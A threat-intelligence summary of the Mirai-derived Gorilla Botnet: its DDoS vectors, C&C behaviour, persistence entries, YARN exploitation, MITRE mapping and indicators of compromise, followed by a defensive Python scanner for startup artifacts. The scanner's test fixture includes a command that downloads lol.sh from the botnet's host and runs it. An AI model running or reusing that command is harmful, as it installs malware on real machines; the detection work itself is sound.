Keypoints
- Active from September 4–27, 2024, issuing over 300,000 DDoS commands with daily peaks above 20,000.
- Targeted 113 countries and 20,000+ targets; China (20%) and the U.S. (19%) were most affected.
- Supports ARM, MIPS, x86_64, and x86 architectures and reuses/modifies Mirai source code with a custom signature.
- Implements many DDoS vectors (up to 19), with UDP Flood (41%), ACK BYPASS Flood (24%), and VSE Flood (12%) most common.
- Includes five built-in C&C servers and selects one at random on startup for command reception.
- Persistence via systemd service (custom.service), /etc/inittab, /etc/profile, /etc/init.d/mybinary, and startup script links; downloads and runs lol.sh from a remote host.
- Counter-detection measures include checking for /proc to detect honeypots and use of KekSec-style encryption to hide strings.
MITRE Techniques
- [T1078] Valid Accounts – Exploits Hadoop YARN RPC unauthorized access to obtain access and elevated privileges (‘yarn_init’ integrates code to exploit the Hadoop Yarn RPC unauthorized access vulnerability)
- [T1203] Execution – Executes downloaded scripts automatically on startup/login to run payloads (‘download a script named lol.sh … set execution permissions, and execute the script’)
- [T1547] Boot or Logon Autostart Execution – Creates service and init entries to persist across reboots (‘creates a service file named custom.service in the /etc/systemd/system/ directory’ and adds entries to /etc/inittab, /etc/profile, /etc/init.d/mybinary)
- [T1562] Impair Defenses – Attempts to detect and avoid honeypots by checking for system artifacts (‘/proc filesystem not found. Exiting. gorilla botnet didnt like this honeypot…’)
- [T1071] Application Layer Protocol – Uses built-in C&C servers for command and control and randomly selects one on startup (‘five built-in command and control (C&C) servers; upon running, it randomly selects one to connect to’)
- [T1499] Endpoint Denial of Service – Executes a range of DDoS attack vectors to disrupt targets (‘Gorilla Botnet issued over 300,000 DDoS attack commands’)
Indicators of Compromise
- [File hashes] Malware samples – 276adc6a55f13a229a5ff482e49f3a0b, 63cbfc2c626da269c67506636bb1ea30, and 5 more hashes
- [Domain] Payload download/C2 host – http://pen.gorillafirewall.su/ (used to download lol.sh)
- [File names] Persistence and propagation artifacts – lol.sh (propagation script), custom.service (systemd service), mybinary (/etc/init.d startup script)
Gorilla Botnet is a Mirai-derived trojan that compiles for ARM, MIPS, x86_64, and x86 and reuses Mirai’s online and command-parsing modules while embedding its own signature. On execution it randomly connects to one of five built-in C&C servers using Mirai-like connection procedures, awaits commands, and supports up to 19 DDoS vectors—most commonly UDP Flood, ACK BYPASS Flood, and VSE Flood—favoring connectionless UDP to spoof sources and amplify traffic despite a limited bot count.
For persistence and propagation, the malware installs a systemd unit (custom.service) to download and run a remote script (lol.sh) from http://pen.gorillafirewall.su/, writes entries to /etc/inittab and /etc/profile, adds an /etc/init.d/mybinary script, and attempts to link it into /etc/rc.d/rc.local or /etc/rc.conf. It also contains a ‘yarn_init’ routine to exploit Hadoop YARN RPC vulnerabilities, allowing it to gain higher privileges on hosts where YARN is installed.
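As an added defender-side example (not code from the NSFOCUS write-up or from the malware), the following Python script checks the startup locations named above for the artifacts attributed to Gorilla Botnet; SAMPLE_INFECTED is a constructed fixture, not a captured host, and the ExecStart body in it is a placeholder.

```python
"""Triage a Linux host's startup locations for the Gorilla Botnet
persistence artifacts described in the report: custom.service,
/etc/inittab, /etc/profile, /etc/init.d/mybinary, rc.local/rc.conf,
and any reference to lol.sh or pen.gorillafirewall.su."""
from pathlib import Path

# Startup files the write-up attributes to the bot's persistence routine.
STARTUP_FILES = (
    "/etc/systemd/system/custom.service",
    "/etc/inittab",
    "/etc/profile",
    "/etc/init.d/mybinary",
    "/etc/rc.d/rc.local",
    "/etc/rc.conf",
)
# Artifact names and download host quoted in the report.
INDICATORS = ("lol.sh", "pen.gorillafirewall.su", "mybinary", "custom.service")


def scan_startup(files: dict) -> list:
    """files maps path -> content (None when the file is absent).
    Returns (path, reason) tuples; an empty list means nothing was found."""
    findings = []
    for path in STARTUP_FILES:
        content = files.get(path)
        if content is None:
            continue
        # Neither the unit file nor the init.d script exists on a clean host.
        if path.endswith(("custom.service", "mybinary")):
            findings.append((path, "unexpected startup artifact present"))
        for ioc in INDICATORS:
            if ioc in content:
                findings.append((path, f"references {ioc}"))
    return findings


def collect_startup(root: str = "/") -> dict:
    """Read the startup files from a live host or a mounted image at root."""
    out = {}
    for path in STARTUP_FILES:
        p = Path(root) / path.lstrip("/")
        out[path] = p.read_text(errors="replace") if p.is_file() else None
    return out


# Constructed fixture imitating the persistence the report describes.
SAMPLE_INFECTED = {
    "/etc/systemd/system/custom.service":
        "[Service]\nExecStart=/bin/sh -c 'wget http://pen.gorillafirewall.su/lol.sh; sh lol.sh'\n",
    "/etc/inittab": "id:3:initdefault:\n::sysinit:/etc/init.d/mybinary\n",
    "/etc/profile": "export PATH\n/bin/sh /tmp/lol.sh &\n",
    "/etc/init.d/mybinary": "#!/bin/sh\n/bin/placeholder\n",
    "/etc/rc.d/rc.local": None,
    "/etc/rc.conf": None,
}
SAMPLE_CLEAN = dict.fromkeys(STARTUP_FILES, None)
SAMPLE_CLEAN["/etc/profile"] = "export PATH\n"

if __name__ == "__main__":
    for path, reason in scan_startup(collect_startup()):
        print(f"{path}: {reason}")
```

Running the script with no arguments scans the live host; pass a mount point to collect_startup() to triage a disk image offline.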
To hinder analysis and detection, Gorilla Botnet uses KekSec-style encryption to conceal key strings and includes anti-honeypot checks (e.g., verifying the presence of /proc and exiting if missing). These combined C2, persistence, exploitation, multi-architecture support, and evasion capabilities enable sustained DDoS operations and broad targeting across sectors.
Read more: https://nsfocusglobal.com/over-300000-gorillabot-the-new-king-of-ddos-attacks/